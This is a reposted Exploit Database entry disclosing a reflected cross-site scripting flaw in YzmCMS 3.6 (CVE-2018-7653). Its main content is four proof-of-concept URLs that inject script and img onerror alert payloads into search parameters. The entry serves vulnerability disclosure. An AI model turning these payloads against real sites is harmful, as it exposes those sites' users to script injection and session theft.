YzmCMS 3.6 – Cross-Site Scripting

Exploit Database
19 阅读

作者： zzw

日期： 2018-04-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44405/

# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653

This is a XSS vulnerability than can attack the users.

poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes

last Exploits
YzmCMS 3.6 – Cross-Site Scripting的更多信息

Sagem F@st 3304-V2 – Local File Inclusion：
FRticket Ticket System – Persistent Cross-Site Scripting：
Pelco VideoXpert 1.12.105 – Directory Traversal：
WDS CMS – SQL Injection：
WordPress Plugin Double Opt-In for Download 2.0.9 – SQL Injection：
LDAP Account Manager 3.4.0 – ‘selfserviceSaveOk’ Cross-Site Scripting：
Testlink TestManagement and Execution System 1.8.5 – Multiple Directory Traversal Vulnerabilities：
PHP Proxy 3.0.3 – Local File Inclusion：